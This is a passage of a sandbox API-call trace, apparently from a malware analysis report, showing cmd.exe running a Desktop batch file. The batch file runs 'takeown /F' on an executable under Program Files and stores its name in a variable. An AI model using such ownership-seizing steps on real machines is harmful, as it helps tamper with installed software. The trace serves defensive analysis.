lpNumberOfBytesRead=0x1ef160*=0xc2, lpOverlapped=0x0) returned 1 [0163.188] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0163.188] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0163.189] _get_osfhandle (_FileHandle=3) returned 0x74 [0163.189] GetFileType (hFile=0x74) returned 0x1 [0163.189] _get_osfhandle (_FileHandle=3) returned 0x74 [0163.189] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0163.189] GetProcessHeap () returned 0x410000 [0163.189] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0163.190] GetProcessHeap () returned 0x410000 [0163.190] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0163.195] _tell (_FileHandle=3) returned 47 [0163.195] _close (_FileHandle=3) returned 0 [0163.195] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eef34 | out: _Buffer="\r\n") returned 2 [0163.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.195] GetFileType (hFile=0x7) returned 0x2 [0163.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef4 | out: lpMode=0x1eeef4) returned 1 [0163.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.197] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eef20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eef20*=0x2) returned 1 [0163.199] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0163.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0163.199] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eef30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0163.199] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eef30 | out: _Buffer=">") returned 1 [0163.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.200] GetFileType (hFile=0x7) returned 0x2 [0163.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.200] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef8 | out: lpMode=0x1eeef8) returned 1 [0163.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eef24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eef24*=0x26) returned 1 [0163.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.201] GetFileType (hFile=0x7) returned 0x2 [0163.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.202] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef17c | out: lpMode=0x1ef17c) returned 1 [0163.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.203] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4112a8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ef1a8, lpReserved=0x0 | out: lpBuffer=0x4112a8*, lpNumberOfCharsWritten=0x1ef1a8*=0x7) returned 1 [0163.203] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef1b4 | out: _Buffer=" /F \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\" ") returned 62 [0163.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.203] GetFileType (hFile=0x7) returned 0x2 [0163.204] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.204] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0163.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.204] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x3e) returned 1 [0163.207] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef1d4 | out: _Buffer="\r\n") returned 2 [0163.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.207] GetFileType (hFile=0x7) returned 0x2 [0163.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef194 | out: lpMode=0x1ef194) returned 1 [0163.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.208] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1c0*=0x2) returned 1 [0163.210] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0163.210] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0163.210] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0163.210] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0163.210] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0163.210] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0163.210] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0163.210] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0163.211] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0163.211] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0163.211] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0163.211] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0163.211] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0163.211] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0163.211] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0163.211] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0163.211] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0163.211] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0163.211] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0163.212] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0163.212] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0163.212] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0163.212] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0163.212] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0163.212] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0163.212] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0163.212] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0163.212] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0163.212] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0163.212] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0163.212] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0163.212] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0163.212] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0163.212] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0163.213] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0163.213] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0163.213] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0163.213] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0163.213] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0163.213] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0163.213] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0163.213] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0163.214] GetConsoleTitleW (in: lpConsoleTitle=0x1eed44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.215] GetConsoleTitleW (in: lpConsoleTitle=0x1eead8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.216] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ee960, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eea28 | out: lpAttributeList=0x1ee960, lpSize=0x1eea28) returned 1 [0163.216] UpdateProcThreadAttribute (in: lpAttributeList=0x1ee960, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eea20, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ee960, lpPreviousValue=0x0) returned 1 [0163.216] GetStartupInfoW (in: lpStartupInfo=0x1ee91c | out: lpStartupInfo=0x1ee91c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0163.621] CloseHandle (hObject=0x74) returned 1 [0163.621] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0163.621] GetProcessHeap () returned 0x410000 [0163.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42a120 | out: hHeap=0x410000) returned 1 [0163.621] GetEnvironmentStringsW () returned 0x427f38* [0163.621] GetProcessHeap () returned 0x410000 [0163.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb5c) returned 0x42a120 [0163.621] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0163.621] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0171.197] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1ee8fc | out: lpExitCode=0x1ee8fc*=0x0) returned 1 [0171.198] CloseHandle (hObject=0x78) returned 1 [0171.198] _vsnwprintf (in: _Buffer=0x1eea44, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ee908 | out: _Buffer="00000000") returned 8 [0171.198] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0171.198] GetProcessHeap () returned 0x410000 [0171.198] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42a120 | out: hHeap=0x410000) returned 1 [0171.198] GetEnvironmentStringsW () returned 0x427f38* [0171.198] GetProcessHeap () returned 0x410000 [0171.198] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb5c) returned 0x42a120 [0171.198] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0171.198] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0171.198] GetProcessHeap () returned 0x410000 [0171.198] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42a120 | out: hHeap=0x410000) returned 1 [0171.198] GetEnvironmentStringsW () returned 0x427f38* [0171.198] GetProcessHeap () returned 0x410000 [0171.198] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb5c) returned 0x42a120 [0171.198] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0171.199] GetProcessHeap () returned 0x410000 [0171.199] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410db8 | out: hHeap=0x410000) returned 1 [0171.199] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ee960 | out: lpAttributeList=0x1ee960) [0171.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.199] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0171.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.199] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0171.200] _get_osfhandle (_FileHandle=0) returned 0x3 [0171.200] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0171.200] SetConsoleInputExeNameW () returned 0x1 [0171.200] GetConsoleOutputCP () returned 0x1b5 [0171.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0171.200] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0171.201] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0171.201] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.201] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426a68 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426938 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426810 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426ce0 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426770 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426558 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4264d8 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4263a8 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426280 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426210 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.202] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426180 | out: hHeap=0x410000) returned 1 [0171.202] GetProcessHeap () returned 0x410000 [0171.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4112a0 | out: hHeap=0x410000) returned 1 [0171.203] GetProcessHeap () returned 0x410000 [0171.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x411240 | out: hHeap=0x410000) returned 1 [0171.203] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.203] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0171.203] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef160*=0xb3, lpOverlapped=0x0) returned 1 [0171.203] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0171.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0171.204] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.204] GetFileType (hFile=0x78) returned 0x1 [0171.204] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.204] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0171.204] GetProcessHeap () returned 0x410000 [0171.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0171.205] GetProcessHeap () returned 0x410000 [0171.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x7a) returned 0x411240 [0171.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", nBufferLength=0x208, lpBuffer=0x1ee8f0, lpFilePart=0x1ee8e8 | out: lpBuffer="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", lpFilePart=0x1ee8e8*="spcwin.exe") returned 0x37 [0171.205] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426180 [0171.205] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0171.205] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0171.206] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1b29000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1b29000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 0x426180 [0171.206] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0171.206] _wcsnicmp (_String1="MICROS~2", _String2="Microsoft Analysis Services", _MaxCount=0x1b) returned 15 [0171.206] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d14b30, ftCreationTime.dwHighDateTime=0x1d5a2a5, ftLastAccessTime.dwLowDateTime=0x4f7f7180, ftLastAccessTime.dwHighDateTime=0x1d5b1ca, ftLastWriteTime.dwLowDateTime=0x4f7f7180, ftLastWriteTime.dwHighDateTime=0x1d5b1ca, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="spcwin.exe", cAlternateFileName="")) returned 0x426180 [0171.206] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0171.206] GetProcessHeap () returned 0x410000 [0171.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1e) returned 0x4277f0 [0171.207] GetProcessHeap () returned 0x410000 [0171.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0171.209] _tell (_FileHandle=3) returned 63 [0171.209] _close (_FileHandle=3) returned 0 [0171.209] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eef34 | out: _Buffer="\r\n") returned 2 [0171.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.209] GetFileType (hFile=0x7) returned 0x2 [0171.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef4 | out: lpMode=0x1eeef4) returned 1 [0171.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.210] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eef20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eef20*=0x2) returned 1 [0172.152] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0172.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0172.153] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eef30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0172.153] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eef30 | out: _Buffer=">") returned 1 [0172.153] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.153] GetFileType (hFile=0x7) returned 0x2 [0172.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef8 | out: lpMode=0x1eeef8) returned 1 [0172.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.155] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eef24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eef24*=0x26) returned 1 [0172.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.155] GetFileType (hFile=0x7) returned 0x2 [0172.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.156] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef17c | out: lpMode=0x1ef17c) returned 1 [0172.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.156] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x410dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef1a8, lpReserved=0x0 | out: lpBuffer=0x410dc0*, lpNumberOfCharsWritten=0x1ef1a8*=0x3) returned 1 [0172.157] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef1b4 | out: _Buffer=" FN=\"spcwin.exe\" ") returned 17 [0172.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.157] GetFileType (hFile=0x7) returned 0x2 [0172.157] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0172.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.158] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x11) returned 1 [0172.158] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef1d4 | out: _Buffer="\r\n") returned 2 [0172.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.158] GetFileType (hFile=0x7) returned 0x2 [0172.159] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef194 | out: lpMode=0x1ef194) returned 1 [0172.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.160] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1c0*=0x2) returned 1 [0172.161] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0172.161] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0172.161] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0172.161] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0172.161] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0172.161] _wcsicmp (_String1="set", _String2="CD") returned 16 [0172.161] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0172.161] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0172.162] _wcsicmp (_String1="set", _String2="REN") returned 1 [0172.162] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0172.162] _wcsicmp (_String1="set", _String2="SET") returned 0 [0172.162] GetConsoleTitleW (in: lpConsoleTitle=0x1eed44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.163] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0172.163] SetEnvironmentVariableW (lpName="FN", lpValue="\"spcwin.exe\"") returned 1 [0172.163] GetProcessHeap () returned 0x410000 [0172.163] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42a120 | out: hHeap=0x410000) returned 1 [0172.163] GetEnvironmentStringsW () returned 0x428ac0* [0172.163] GetProcessHeap () returned 0x410000 [0172.163] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb7c) returned 0x429648 [0172.163] FreeEnvironmentStringsW (penv=0x428ac0) returned 1 [0172.163] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.164] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.164] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.164] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0172.165] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.165] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0172.165] SetConsoleInputExeNameW () returned 0x1 [0172.165] GetConsoleOutputCP () returned 0x1b5 [0172.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0172.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0172.166] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0172.166] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.166] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426218 | out: hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4261e0 | out: hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4255e8 | out: hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410db8 | out: 